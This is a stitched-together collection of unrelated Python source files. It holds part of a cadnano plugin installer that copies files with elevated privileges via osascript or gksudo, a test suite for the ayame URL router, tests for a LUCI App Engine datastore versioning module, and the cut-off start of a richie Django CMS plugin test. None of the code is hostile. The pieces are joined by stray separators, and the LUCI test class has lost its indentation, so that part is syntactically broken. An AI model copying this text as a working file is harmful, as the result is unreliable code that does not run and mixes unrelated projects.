        tdir = tempfile.mkdtemp()
        try:
            # Create directories first, then extract the regular members.
            for f in zf.namelist():
                if f.endswith('/'):
                    os.makedirs(os.path.join(tdir,f))
            for f in zf.namelist():
                if not f.endswith('/'):
                    zf.extract(f, tdir)
        except Exception as e:
            self.failWithMsg("Extraction of plugin archive failed: %s."%e)
            return
        finally:
            # BUG FIX: the archive handle was previously leaked; close it on
            # both the success and failure paths.
            zf.close()
        filesInZip = [(f, os.path.join(tdir, f)) for f in os.listdir(tdir)]
        try:
            self.confirmDestructiveIfNecessary(filesInZip)
            self.removePluginsToBeOverwritten(filesInZip)
            self.movePluginsIntoPluginsFolder(filesInZip)
        except OSError:
            print("Couldn't copy files into plugin directory, attempting\
 again after boosting privileges.")
            if platform.system() == 'Darwin':
                self.darwinAuthedMvPluginsIntoPluginsFolder(filesInZip)
            elif platform.system() == 'Linux':
                self.linuxAuthedMvPluginsIntoPluginsFolder(filesInZip)
            else:
                print("Can't boost privelages on platform %s"%platform.system())
        loadedAPlugin = cadnano.loadAllPlugins()
        if not loadedAPlugin:
            print("Unable to load anythng from plugin %s"%fname)
        self.readPreferences()
        shutil.rmtree(tdir)

    def darwinAuthedMvPluginsIntoPluginsFolder(self, filesInZip):
        """OS X fallback: copy the plugin files with administrator privileges via osascript."""
        envirn={"DST":cadnano.path()+'/plugins'}
        srcstr = ''
        # Pass each source path through the environment so the shell string
        # never contains un-escaped user paths.
        for i, (fileName, filePath) in enumerate(filesInZip):
            srcstr += ' \\"$SRC' + str(i) + '\\"'
            envirn['SRC'+str(i)] = filePath
        proc = subprocess.Popen(['osascript','-e',\
                        'do shell script "cp -fR ' + srcstr +\
                        ' \\"$DST\\"" with administrator privileges'],\
                        env=envirn)
        retval = self.waitForProcExit(proc)
        if retval != 0:
            self.failWithMsg('cp failed with code %i'%retval)

    def linuxAuthedMvPluginsIntoPluginsFolder(self, filesInZip):
        """Linux fallback: copy the plugin files as root via gksudo."""
        args = ['gksudo', 'cp', '-fR']
        args.extend(filePath for fileName, filePath in filesInZip)
        args.append(cadnano.path()+'/plugins')
        proc = subprocess.Popen(args)
        retval = self.waitForProcExit(proc)
        if retval != 0:
            self.failWithMsg('cp failed with code %i'%retval)

    def confirmDestructiveIfNecessary(self, filesInZip):
        """Ask the user for confirmation if any plugin file would overwrite an existing one."""
        for fileName, filePath in filesInZip:
            target = os.path.join(cadnano.path(), 'plugins', fileName)
            if os.path.isfile(target):
                return self.confirmDestructive()
            elif os.path.isdir(target):
                return self.confirmDestructive()

    def confirmDestructive(self):
        """Show a Yes/No overwrite warning; return True when the user accepts."""
        mb = QMessageBox(self.widget)
        mb.setIcon(QMessageBox.Warning)
        mb.setInformativeText("The plugin you are trying to install\
 has already been installed. Replace the currently installed one?")
        mb.setStandardButtons(QMessageBox.No | QMessageBox.Yes)
        mb.exec_()
        return mb.clickedButton() == mb.button(QMessageBox.Yes)

    def removePluginsToBeOverwritten(self, filesInZip):
        """Delete any existing plugin files/directories that the new archive will replace."""
        for fileName, filePath in filesInZip:
            target = os.path.join(cadnano.path(), 'plugins', fileName)
            if os.path.isfile(target):
                os.unlink(target)
            elif os.path.isdir(target):
                shutil.rmtree(target)

    def movePluginsIntoPluginsFolder(self, filesInZip):
        for fileName, filePath in filesInZip:
            target = os.path.join(cadnano.path(), 'plugins', fileName)
            shutil.move(filePath, target)

    def waitForProcExit(self, proc):
        """Wait for *proc* to exit, retrying on EINTR; return its exit code."""
        procexit = False
        while not procexit:
            try:
                retval = proc.wait()
                procexit = True
            except OSError as e:
                if e.errno != errno.EINTR:
                    # BUG FIX: the original `raise ose` referenced an undefined
                    # name (NameError); re-raise the caught exception instead.
                    raise
        return retval

    def failWithMsg(self, str):
        """Show a warning message box with the given text (mode-less).

        NOTE(review): the parameter name shadows the builtin `str`; kept for
        backward compatibility with any keyword callers.
        """
        mb = QMessageBox(self.widget)
        mb.setIcon(QMessageBox.Warning)
        mb.setInformativeText(str)
        mb.buttonClicked.connect(self.closeFailDialog)
        # Keep a reference so the message box isn't garbage-collected while open.
        self.failMessageBox = mb
        mb.open()

    def closeFailDialog(self, button):
        self.failMessageBox.close()
        del self.failMessageBox
#
# test_route
#
# Copyright (c) 2011-2021 <NAME> <<EMAIL>>
#
# SPDX-License-Identifier: MIT
#
import ayame
from ayame import http, route
from base import AyameTestCase
class RouteTestCase(AyameTestCase):
    """Tests for ayame.route: rule matching, redirects, converters and URI building."""
    def test_static_rules(self):
        """Static (variable-free) rules: match, redirect, method errors, URI building."""
        map = route.Map()
        map.connect('/', 0)
        map.connect('/news', 1, methods=['GET', 'HEAD'])
        # GET /
        router = map.bind(self.new_environ(path='/'))
        self.assertEqual(router.match(), (0, {}))
        # GET /?a=1
        router = map.bind(self.new_environ(path='/', query='a=1'))
        self.assertEqual(router.match(), (0, {}))
        # GET (empty path info) -> MovedPermanently
        router = map.bind(self.new_environ(path=''))
        with self.assertRaises(http.MovedPermanently) as cm:
            router.match()
        self.assertEqual(cm.exception.headers, [
            ('Location', 'http://localhost/'),
        ])
        # HEAD / -> NotImplemented
        router = map.bind(self.new_environ(method='HEAD', path='/'))
        with self.assertRaises(http.NotImplemented) as cm:
            router.match()
        self.assertEqual(cm.exception.headers, [])
        # GET /news
        router = map.bind(self.new_environ(path='/news'))
        self.assertEqual(router.match(), (1, {}))
        # PUT /news -> NotImplemented
        router = map.bind(self.new_environ(method='PUT', path='/news'))
        with self.assertRaises(http.NotImplemented):
            router.match()
        # GET /404 -> NotFound
        router = map.bind(self.new_environ(path='/404'))
        with self.assertRaises(http.NotFound):
            router.match()
        # build URI
        router = map.bind(self.new_environ(path='/'))
        with self.assertRaises(ayame.RouteError):
            router.build(-1)
        with self.assertRaises(ayame.RouteError):
            router.build(0, method='PUT')
        self.assertEqual(router.build(0),
                         '/')
        self.assertEqual(router.build(0, {'a': ['1']}, query=False),
                         '/')
        self.assertEqual(router.build(0, {'a': ['1']}),
                         '/?a=1')
        self.assertEqual(router.build(0, {'a': ['1']}, 'ch1'),
                         '/?a=1#ch1')
        self.assertEqual(router.build(0, anchor='ch1'),
                         '/#ch1')
        self.assertEqual(router.build(0, {'a': 1}),
                         '/?a=1')
        self.assertEqual(router.build(0, {'a': '1'}),
                         '/?a=1')
        self.assertEqual(router.build(0, {'a': [1]}),
                         '/?a=1')
        self.assertEqual(router.build(0, {'a': (1,)}),
                         '/?a=1')
        self.assertEqual(router.build(0, {'a': ['1']}),
                         '/?a=1')
        self.assertEqual(router.build(0, {'a': ('1',)}),
                         '/?a=1')
        self.assertEqual(router.build(0, {'a': ''}),
                         '/?a=')
        self.assertEqual(router.build(0, {'a': 1, 'z': 3, 'm': 2}),
                         '/?a=1&m=2&z=3')
        self.assertEqual(router.build(0, {'a': [3, 2, 1]}),
                         '/?a=3&a=2&a=1')
        # A custom sort key reorders the query parameters.
        map.sort_key = lambda o: -ord(o[0])
        self.assertEqual(router.build(0, {'a': 1, 'z': [3, 2], 'm': [1, 2]}),
                         '/?z=3&z=2&m=1&m=2&a=1')
        # build URI (without SCRIPT_NAME)
        environ = self.new_environ(path='/')
        environ['SCRIPT_NAME'] = '/ayame'
        router = map.bind(environ)
        self.assertEqual(router.build(0), '/ayame/')
        self.assertEqual(router.build(0, relative=True), '/')
    def test_no_static(self):
        """A rule consisting of a single variable with no static prefix."""
        map = route.Map()
        map.connect('<a>', 0)
        router = map.bind(self.new_environ(path='app'))
        self.assertEqual(router.match(), (0, {'a': 'app'}))
    def test_duplicate_variable(self):
        """Reusing a variable name in one rule raises RouteError."""
        map = route.Map()
        with self.assertRaisesRegex(ayame.RouteError, r"'a' already in use$"):
            map.connect('/<a>/<b>/<a>/<c>', 0)
    def test_unknown_converter(self):
        """Referencing an unregistered converter raises RouteError."""
        map = route.Map()
        with self.assertRaisesRegex(ayame.RouteError, r" 'spam' not found$"):
            map.connect('/<a:spam>', 0)
    def test_custom_converter(self):
        """A user-supplied converter class can be registered and used in rules."""
        class SpamConverter(route.Converter):
            pass
        map = route.Map(converters={'spam': SpamConverter})
        map.connect('/<a:spam>', 0)
        router = map.bind(self.new_environ(path='/app'))
        self.assertEqual(router.match(), (0, {'a': 'app'}))
    def test_int_converter(self):
        """int converter: fixed digits, min/max bounds, matching and URI building."""
        map = route.Map()
        map.connect('/<y:int>/', 0)
        map.connect('/<y:int>/<m:int(2, min=1, max=12)>/', 1)
        map.connect('/_/<a:int(2)>/', 2)
        # GET /2011 -> MovedPermanently
        router = map.bind(self.new_environ(path='/2011'))
        with self.assertRaises(http.MovedPermanently) as cm:
            router.match()
        self.assertEqual(cm.exception.headers, [
            ('Location', 'http://localhost/2011/'),
        ])
        # GET /2011/
        router = map.bind(self.new_environ(path='/2011/'))
        self.assertEqual(router.match(), (0, {'y': 2011}))
        # GET /0/
        router = map.bind(self.new_environ(path='/0/'))
        self.assertEqual(router.match(), (0, {'y': 0}))
        # GET /2011/01 -> MovedPermanently
        router = map.bind(self.new_environ(path='/2011/01'))
        with self.assertRaises(http.MovedPermanently) as cm:
            router.match()
        self.assertEqual(cm.exception.headers, [
            ('Location', 'http://localhost/2011/01/'),
        ])
        # GET /2011/01/
        router = map.bind(self.new_environ(path='/2011/01/'))
        self.assertEqual(router.match(), (1, {'y': 2011, 'm': 1}))
        # GET /2011/12/
        router = map.bind(self.new_environ(path='/2011/12/'))
        self.assertEqual(router.match(), (1, {'y': 2011, 'm': 12}))
        # GET /2011/1/ -> NotFound
        router = map.bind(self.new_environ(path='/2011/1/'))
        with self.assertRaises(http.NotFound):
            router.match()
        # GET /2011/100/ -> NotFound
        router = map.bind(self.new_environ(path='/2011/100/'))
        with self.assertRaises(http.NotFound):
            router.match()
        # GET /2011/00/ -> NotFound
        router = map.bind(self.new_environ(path='/2011/00/'))
        with self.assertRaises(http.NotFound):
            router.match()
        # GET /2011/13/ -> NotFound
        router = map.bind(self.new_environ(path='/2011/13/'))
        with self.assertRaises(http.NotFound):
            router.match()
        # build URI
        router = map.bind(self.new_environ(path='/'))
        with self.assertRaises(ayame.RouteError):
            router.build(-1)
        with self.assertRaises(ayame.RouteError):
            router.build(0)
        with self.assertRaises(ayame.RouteError):
            router.build(0, {'y': None})
        with self.assertRaises(ayame.RouteError):
            router.build(0, {'y': 'a'})
        self.assertEqual(router.build(0, {'y': [2011]}),
                         '/2011/')
        self.assertEqual(router.build(0, {'y': ['2011']}),
                         '/2011/')
        self.assertEqual(router.build(0, {'y': 2011}),
                         '/2011/')
        self.assertEqual(router.build(0, {'y': '2011'}),
                         '/2011/')
        self.assertEqual(router.build(0, {'y': ['2010', '2011']}),
                         '/2010/?y=2011')
        self.assertEqual(router.build(0, {'y': ['2010', '2011']}, query=False),
                         '/2010/')
        with self.assertRaises(ayame.RouteError):
            router.build(1)
        with self.assertRaises(ayame.RouteError):
            router.build(1, {'y': 2011, 'm': 0})
        with self.assertRaises(ayame.RouteError):
            router.build(1, {'y': 2011, 'm': 13})
        with self.assertRaises(ayame.RouteError):
            router.build(1, {'y': 2011, 'm': 100})
        self.assertEqual(router.build(1, {'y': 2011, 'm': 1}), '/2011/01/')
        self.assertEqual(router.build(1, {'y': 2011, 'm': 12}), '/2011/12/')
        with self.assertRaises(ayame.RouteError):
            router.build(2, {'a': 100})
    def test_string_converter(self):
        """string converter: fixed length, min length, matching and URI building."""
        map = route.Map()
        map.connect('/<s:string(2)>/', 0)
        map.connect('/<s:string(3, min=3)>/', 1)
        map.connect('/<s:string>/', 2)
        # GET /jp -> MovedPermanently
        router = map.bind(self.new_environ(path='/jp'))
        with self.assertRaises(http.MovedPermanently):
            router.match()
        # GET /jp/
        router = map.bind(self.new_environ(path='/jp/'))
        self.assertEqual(router.match(), (0, {'s': 'jp'}))
        # GET /jpy -> MovedPermanently
        router = map.bind(self.new_environ(path='/jpy'))
        with self.assertRaises(http.MovedPermanently):
            router.match()
        # GET /jpy/
        router = map.bind(self.new_environ(path='/jpy/'))
        self.assertEqual(router.match(), (1, {'s': 'jpy'}))
        # GET /news -> MovedPermanently
        router = map.bind(self.new_environ(path='/news'))
        with self.assertRaises(http.MovedPermanently):
            router.match()
        # GET /news/
        router = map.bind(self.new_environ(path='/news/'))
        self.assertEqual(router.match(), (2, {'s': 'news'}))
        # build URI
        router = map.bind(self.new_environ(path='/'))
        with self.assertRaises(ayame.RouteError):
            router.build(-1)
        with self.assertRaises(ayame.RouteError):
            router.build(0)
        with self.assertRaises(ayame.RouteError):
            router.build(0, {'s': None})
        with self.assertRaises(ayame.RouteError):
            router.build(0, {'s': ''})
        with self.assertRaises(ayame.RouteError):
            router.build(0, {'s': 'abc'})
        self.assertEqual(router.build(0, {'s': 'jp'}), '/jp/')
        self.assertEqual(router.build(0, {'s': 'us'}), '/us/')
        with self.assertRaises(ayame.RouteError):
            router.build(1)
        with self.assertRaises(ayame.RouteError):
            router.build(1, {'s': None})
        with self.assertRaises(ayame.RouteError):
            router.build(1, {'s': ''})
        with self.assertRaises(ayame.RouteError):
            router.build(1, {'s': 'ab'})
        with self.assertRaises(ayame.RouteError):
            router.build(1, {'s': 'abcd'})
        self.assertEqual(router.build(1, {'s': 'jpy'}), '/jpy/')
        self.assertEqual(router.build(1, {'s': 'usd'}), '/usd/')
    def test_path_converter(self):
        """path converter: greedy segment matching with and without a trailing variable."""
        map = route.Map()
        map.connect('/<p:path>/<m>', 0)
        map.connect('/<p:path>', 1)
        # GET /WikiPage/edit
        router = map.bind(self.new_environ(path='/WikiPage/edit'))
        self.assertEqual(router.match(), (0, {'p': 'WikiPage', 'm': 'edit'}))
        # GET /WikiPage/edit/
        router = map.bind(self.new_environ(path='/WikiPage/edit/'))
        self.assertEqual(router.match(), (0, {'p': 'WikiPage', 'm': 'edit'}))
        # GET /WikiPage
        router = map.bind(self.new_environ(path='/WikiPage'))
        self.assertEqual(router.match(), (1, {'p': 'WikiPage'}))
        # GET /WikiPage/
        router = map.bind(self.new_environ(path='/WikiPage/'))
        self.assertEqual(router.match(), (1, {'p': 'WikiPage'}))
        # build URI
        router = map.bind(self.new_environ(path='/'))
        with self.assertRaises(ayame.RouteError):
            router.build(-1)
        with self.assertRaises(ayame.RouteError):
            router.build(0)
        with self.assertRaises(ayame.RouteError):
            router.build(0, {'p': None})
        with self.assertRaises(ayame.RouteError):
            router.build(0, {'p': ''})
        self.assertEqual(router.build(0, {'p': 'WikiPage', 'm': 'edit'}),
                         '/WikiPage/edit')
        self.assertEqual(router.build(0, {'p': 'WikiPage', 'm': 'delete'}),
                         '/WikiPage/delete')
        self.assertEqual(router.build(0, {'p': '', 'm': ''}),
                         '//')
        with self.assertRaises(ayame.RouteError):
            router.build(1)
        self.assertEqual(router.build(1, {'p': 'WikiPage'}), '/WikiPage')
        self.assertEqual(router.build(1, {'p': ''}), '/')
    def test_redirect(self):
        """Redirect rules: target as a template string and as a callable."""
        map = route.Map()
        map.redirect('/<y:int>/<m:int(2, min=1, max=12)>/', '/_/<y>/<m>/')
        map.redirect('/<s:string(2)>/', lambda s: f'/_/{s}/')
        # GET /2011/01/ -> MovedPermanently
        router = map.bind(self.new_environ(path='/2011/01/'))
        with self.assertRaises(http.MovedPermanently) as cm:
            router.match()
        self.assertEqual(cm.exception.headers, [
            ('Location', 'http://localhost/_/2011/01/'),
        ])
        # GET /jp/ -> MovedPermanently
        router = map.bind(self.new_environ(path='/jp/'))
        with self.assertRaises(http.MovedPermanently) as cm:
            router.match()
        self.assertEqual(cm.exception.headers, [
            ('Location', 'http://localhost/_/jp/'),
        ])
    def test_add_rule(self):
        """Adding the same Rule object twice raises RouteError."""
        rule = route.Rule('/', 0)
        map = route.Map()
        map.add(rule)
        with self.assertRaises(ayame.RouteError):
            map.add(rule)
    def test_mount(self):
        """Submaps created with mount() prefix their rules with the mount path."""
        map = route.Map()
        submap = map.mount('/_')
        submap.connect('/', 0)
        submap.redirect('/old', '/_/new')
        submap.add(route.Rule('/news/', 1))
        # GET /_/
        router = map.bind(self.new_environ(path='/_/'))
        self.assertEqual(router.match(), (0, {}))
        # GET /_/news/
        router = map.bind(self.new_environ(path='/_/news/'))
        self.assertEqual(router.match(), (1, {}))
        # GET /_/old -> MovedPermanently
        router = map.bind(self.new_environ(path='/_/old'))
        with self.assertRaises(http.MovedPermanently) as cm:
            router.match()
        self.assertEqual(cm.exception.headers, [
            ('Location', 'http://localhost/_/new'),
        ])
    def test_parse_args(self):
        """Rule._parse_args: Python-literal parsing of converter argument strings."""
        rule = route.Rule('/', 1)
        self.assertEqual(rule._parse_args(''), ((), {}))
        self.assertEqual(rule._parse_args(' '), ((), {}))
        self.assertEqual(rule._parse_args(' , '), ((), {}))
        self.assertEqual(rule._parse_args('None, True, False'),
                         ((None, True, False), {}))
        self.assertEqual(rule._parse_args('0, 1, 0b10, 0o10, 0x10'),
                         ((0, 1, 2, 8, 16), {}))
        self.assertEqual(rule._parse_args('0, -1, -0b10, -0o10, -0x10'),
                         ((0, -1, -2, -8, -16), {}))
        self.assertEqual(rule._parse_args('3.14, 10., .001, 1e100, 3.14e-10, 0e0'),
                         ((3.14, 10.0, 0.001, 1e+100, 3.14e-10, 0.0), {}))
        self.assertEqual(rule._parse_args(r'"spam", "eggs\"ham", "toast\\"'),
                         (('spam', 'eggs"ham', r'toast\\'), {}))
        self.assertEqual(rule._parse_args('0, spam=1'), ((0,), {'spam': 1}))
        self.assertEqual(rule._parse_args('0, spam = 1'), ((0,), {'spam': 1}))
        with self.assertRaises(SyntaxError):
            rule._parse_args('0, 1 2, 3')
        with self.assertRaises(SyntaxError):
            rule._parse_args('0, spam=1, 2')
        with self.assertRaises(SyntaxError):
            rule._parse_args('0, spam=1, spam=2')
        with self.assertRaises(SyntaxError):
            rule._parse_args(r'"spam\\"eggs"')
        with self.assertRaises(SyntaxError):
            rule._parse_args(r'"spam\"')
|
#!/usr/bin/env python
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import sys
import unittest
from test_support import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components.datastore_utils import monotonic
from components.datastore_utils import txn
from test_support import test_case
# Access to a protected member _XX of a client class - pylint: disable=W0212
class EntityX(ndb.Model):
    """Minimal test model with one integer property and an overridable put hook."""
    # Arbitrary integer payload; the surrounding tests mainly compare entity keys.
    a = ndb.IntegerProperty()
    def _pre_put_hook(self):
        """Chains to the base hook; the tests mock this method to observe put() calls."""
        super(EntityX, self)._pre_put_hook()
class EntityY(ndb.Model):
    """Minimal test model with no properties; only the put hook is of interest."""
    def _pre_put_hook(self):
        """Chains to the base hook; the tests mock this method to observe put() calls."""
        super(EntityY, self)._pre_put_hook()
class MonotonicTest(test_case.TestCase):
def setUp(self):
super(MonotonicTest, self).setUp()
self.parent = ndb.Key('Root', 1)
def test_insert(self):
data = EntityX(id=1, parent=self.parent)
called = []
self.mock(EntityX, '_pre_put_hook', lambda _: called.append(1))
actual = monotonic.insert(data, None)
expected = ndb.Key('EntityX', 1, parent=self.parent)
self.assertEqual(expected, actual)
self.assertEqual([1], called)
def test_insert_already_present(self):
EntityX(id=1, parent=self.parent).put()
data = EntityX(id=1, parent=self.parent)
actual = monotonic.insert(data, None)
self.assertEqual(None, actual)
def test_insert_new_key(self):
data = EntityX(id=1, parent=self.parent)
extra = EntityY(id=1, parent=data.key)
# Make sure the _pre_put_hook functions are called.
called = []
self.mock(EntityX, '_pre_put_hook', lambda _: called.append(1))
self.mock(EntityY, '_pre_put_hook', lambda _: called.append(2))
actual = monotonic.insert(data, self.fail, extra=[extra])
expected = ndb.Key('EntityX', 1, parent=self.parent)
self.assertEqual(expected, actual)
self.assertEqual([1, 2], called)
def test_insert_new_key_already_present(self):
EntityX(id=1, parent=self.parent).put()
data = EntityX(id=1, parent=self.parent)
called = []
self.mock(EntityX, '_pre_put_hook', lambda _: called.append(1))
new_key = ndb.Key('EntityX', 2, parent=self.parent)
actual = monotonic.insert(data, lambda: called.append(2) or new_key)
expected = ndb.Key('EntityX', 2, parent=self.parent)
self.assertEqual(expected, actual)
self.assertEqual([2, 1], called)
def test_insert_new_key_already_present_twice(self):
EntityX(id=1, parent=self.parent).put()
EntityX(id=2, parent=self.parent).put()
data = EntityX(id=1, parent=self.parent)
new_keys = [
ndb.Key('EntityX', 2, parent=self.parent),
ndb.Key('EntityX', 3, parent=self.parent),
]
actual = monotonic.insert(data, lambda: new_keys.pop(0))
self.assertEqual([], new_keys)
expected = ndb.Key('EntityX', 3, parent=self.parent)
self.assertEqual(expected, actual)
def test_insert_new_key_already_present_twice_fail_after(self):
EntityX(id=1, parent=self.parent).put()
EntityX(id=2, parent=self.parent).put()
EntityX(id=3, parent=self.parent).put()
data = EntityX(id=1, parent=self.parent)
new_keys = [
ndb.Key('EntityX', 2, parent=self.parent),
ndb.Key('EntityX', 3, parent=self.parent),
]
actual = monotonic.insert(
data, lambda: new_keys.pop(0) if new_keys else None)
self.assertEqual([], new_keys)
self.assertEqual(None, actual)
def test_insert_transaction_failure(self):
EntityX(id=1, parent=self.parent).put()
calls = []
def transaction_async(*args, **kwargs):
calls.append(1)
if len(calls) < 2:
raise txn.CommitError()
return old_transaction_async(*args, **kwargs)
old_transaction_async = self.mock(
txn, 'transaction_async', transaction_async)
actual = monotonic.insert(EntityX(id=2, parent=self.parent))
expected = ndb.Key('EntityX', 2, parent=self.parent)
self.assertEqual(expected, actual)
self.assertEqual([1, 1], calls)
def test_get_versioned_root_model(self):
cls = monotonic.get_versioned_root_model('fidoula')
self.assertEqual('fidoula', cls._get_kind())
self.assertTrue(issubclass(cls, ndb.Model))
self.assertEqual(53, cls(current=53).current)
    def test_get_versioned_most_recent(self):
        """get_versioned_most_recent() returns the newest stored version."""
        # First entity id is HIGH_KEY_ID, second is HIGH_KEY_ID-1 (ids count
        # down from HIGH_KEY_ID).
        cls = monotonic.get_versioned_root_model('fidoula')
        parent_key = ndb.Key(cls, 'foo')
        for i in (monotonic.HIGH_KEY_ID, monotonic.HIGH_KEY_ID-1):
            monotonic.store_new_version(EntityX(parent=parent_key), cls)
        actual = monotonic.get_versioned_most_recent(EntityX, parent_key)
        # i holds the last loop value, i.e. the most recently stored id.
        expected = EntityX(key=ndb.Key('EntityX', i, parent=parent_key))
        self.assertEqual(expected, actual)
    def test_get_versioned_most_recent_with_root(self):
        """get_versioned_most_recent_with_root() returns both the root entity
        (with .current pointing at the newest id) and the newest child."""
        # First entity id is HIGH_KEY_ID, second is HIGH_KEY_ID-1.
        cls = monotonic.get_versioned_root_model('fidoula')
        parent_key = ndb.Key(cls, 'foo')
        for i in (monotonic.HIGH_KEY_ID, monotonic.HIGH_KEY_ID-1):
            monotonic.store_new_version(EntityX(parent=parent_key), cls)
        actual = monotonic.get_versioned_most_recent_with_root(
            EntityX, parent_key)
        expected = (
            cls(key=parent_key, current=i),
            EntityX(key=ndb.Key('EntityX', i, parent=parent_key)),
        )
        self.assertEqual(expected, actual)
    def test_get_versioned_most_recent_with_root_already_saved(self):
        """A pre-existing root entity with .current == None is tolerated: the
        first stored version still gets id HIGH_KEY_ID."""
        # Stores the root entity with .current == None.
        cls = monotonic.get_versioned_root_model('fidoula')
        parent_key = ndb.Key(cls, 'foo')
        cls(key=parent_key).put()
        monotonic.store_new_version(EntityX(parent=parent_key), cls)
        actual = monotonic.get_versioned_most_recent_with_root(EntityX, parent_key)
        expected = (
            cls(key=parent_key, current=monotonic.HIGH_KEY_ID),
            EntityX(key=ndb.Key('EntityX', monotonic.HIGH_KEY_ID, parent=parent_key)),
        )
        self.assertEqual(expected, actual)
    def test_get_versioned_most_recent_with_root_already_saved_invalid(self):
        """A pre-set out-of-range .current value is not rejected; the stored
        value apparently drives the id of the next version (expected entity id
        matches the pre-set 23) — NOTE(review): confirm against
        monotonic.store_new_version's allocation logic."""
        # Stores the root entity with an invalid .current value.
        cls = monotonic.get_versioned_root_model('fidoula')
        parent_key = ndb.Key(cls, 'foo')
        cls(key=parent_key, current=23).put()
        monotonic.store_new_version(EntityX(parent=parent_key), cls)
        actual = monotonic.get_versioned_most_recent_with_root(EntityX, parent_key)
        expected = (
            cls(key=parent_key, current=23),
            EntityX(key=ndb.Key('EntityX', 23, parent=parent_key)),
        )
        self.assertEqual(expected, actual)
    def test_get_versioned_most_recent_with_root_unexpected_extra(self):
        """Entities in the version id range that were not stored via
        store_new_version() are skipped by both lookup and allocation."""
        cls = monotonic.get_versioned_root_model('fidoula')
        parent_key = ndb.Key(cls, 'foo')
        monotonic.store_new_version(EntityX(parent=parent_key), cls)
        monotonic.store_new_version(EntityX(parent=parent_key), cls)
        # Sneak an entity in at the next id without updating the root.
        EntityX(id=monotonic.HIGH_KEY_ID-2, parent=parent_key).put()
        # The unexpected entity is not registered.
        actual = monotonic.get_versioned_most_recent_with_root(EntityX, parent_key)
        expected = (
            cls(key=parent_key, current=monotonic.HIGH_KEY_ID-1),
            EntityX(
                key=ndb.Key('EntityX', monotonic.HIGH_KEY_ID-1, parent=parent_key)),
        )
        self.assertEqual(expected, actual)
        # The unexpected entity is safely skipped. In particular, root.current was
        # updated properly.
        monotonic.store_new_version(EntityX(parent=parent_key), cls)
        actual = monotonic.get_versioned_most_recent_with_root(EntityX, parent_key)
        expected = (
            cls(key=parent_key, current=monotonic.HIGH_KEY_ID-3),
            EntityX(
                key=ndb.Key('EntityX', monotonic.HIGH_KEY_ID-3, parent=parent_key)),
        )
        self.assertEqual(expected, actual)
def test_store_new_version(self):
cls = monotonic.get_versioned_root_model('fidoula')
parent = ndb.Key(cls, 'foo')
actual = monotonic.store_new_version(EntityX(a=1, parent=parent), cls)
self.assertEqual(
ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID), actual)
actual = monotonic.store_new_version(EntityX(a=2, parent=parent), cls)
self.assertEqual(
ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID - 1), actual)
    def test_store_new_version_extra(self):
        """store_new_version() can atomically put unrelated entities alongside
        the new version."""
        # Includes an unrelated entity in the PUT. It must be in the same entity
        # group.
        cls = monotonic.get_versioned_root_model('fidoula')
        parent = ndb.Key(cls, 'foo')

        class Unrelated(ndb.Model):
            # Arbitrary payload to verify the extra entity was stored intact.
            b = ndb.IntegerProperty()

        unrelated = Unrelated(id='bar', parent=parent, b=42)
        actual = monotonic.store_new_version(
            EntityX(a=1, parent=parent), cls, extra=[unrelated])
        self.assertEqual(
            ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID), actual)
        actual = monotonic.store_new_version(EntityX(a=2, parent=parent), cls)
        self.assertEqual(
            ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID - 1), actual)
        # The extra entity was committed with its payload intact.
        self.assertEqual({'b': 42}, unrelated.key.get().to_dict())
    def test_store_new_version_transaction_failure(self):
        """A failed commit must not consume the key id: the retry stores the
        version under the same id."""
        # Ensures that when a transaction fails, the key id is not modified and the
        # retry is on the same key id.
        cls = monotonic.get_versioned_root_model('fidoula')
        parent = ndb.Key(cls, 'foo')
        actual = monotonic.store_new_version(EntityX(a=1, parent=parent), cls)
        calls = []
        def transaction_async(*args, **kwargs):
            # Fail only the first commit attempt.
            calls.append(1)
            if len(calls) < 2:
                raise txn.CommitError()
            return old_transaction_async(*args, **kwargs)
        old_transaction_async = self.mock(
            txn, 'transaction_async', transaction_async)
        actual = monotonic.store_new_version(EntityX(a=2, parent=parent), cls)
        self.assertEqual(
            ndb.Key('fidoula', 'foo', 'EntityX', monotonic.HIGH_KEY_ID - 1), actual)
        self.assertEqual([1, 1], calls)
if __name__ == '__main__':
    # In verbose mode also show unabridged assertion diffs, which helps when
    # comparing large entities.
    if '-v' in sys.argv:
        unittest.TestCase.maxDiff = None
    unittest.main()
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Unit tests for the BlogPost plugin and its model
"""
import re
from datetime import datetime
from unittest import mock
from django import forms
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.test.client import RequestFactory
from django.utils import timezone
from cms.api import add_plugin, create_page
from cms.plugin_rendering import ContentRenderer
from cms.test_utils.testcases import CMSTestCase
from richie.apps.core.factories import UserFactory
from richie.apps.core.helpers import create_i18n_page
from richie.apps.courses.cms_plugins import BlogPostPlugin
from richie.apps.courses.factories import BlogPostFactory
from richie.apps.courses.models import BlogPostPluginModel
class BlogPostPluginTestCase(CMSTestCase):
    """
    Test that BlogPostPlugin correctly displays a BlogPost's page placeholders content
    """

    def test_cms_plugins_blogpost_form_page_choices(self):
        """
        The form to create a blogpost plugin should only list blogpost pages
        in the select box.
        """

        class BlogPostPluginModelForm(forms.ModelForm):
            """A form for testing the choices in the select box"""

            class Meta:
                model = BlogPostPluginModel
                fields = ["page"]

        blog_page = create_i18n_page("my title", published=True)
        blogpost = BlogPostFactory(page_parent=blog_page)
        other_page_title = "other page"
        create_page(
            other_page_title, "richie/single_column.html", settings.LANGUAGE_CODE
        )
        plugin_form = BlogPostPluginModelForm()
        rendered_form = plugin_form.as_table()
        # The blogpost page appears exactly once in the rendered choices.
        self.assertEqual(rendered_form.count(blogpost.extended_object.get_title()), 1)
        self.assertNotIn(other_page_title, plugin_form.as_table())

    def test_cms_plugins_blogpost_render_on_public_page(self):
        """
        The blogpost plugin should render as expected on a public page.
        """
        # Create a blogpost
        blogpost = BlogPostFactory(
            page_title={"en": "public title", "fr": "titre public"},
            fill_cover={
                "original_filename": "cover.jpg",
                "default_alt_text": "my cover",
            },
        )
        blogpost_page = blogpost.extended_object
        # Create a page to add the plugin to
        page = create_i18n_page({"en": "A page", "fr": "Une page"})
        placeholder = page.placeholders.get(slot="maincontent")
        add_plugin(placeholder, BlogPostPlugin, "en", **{"page": blogpost_page})
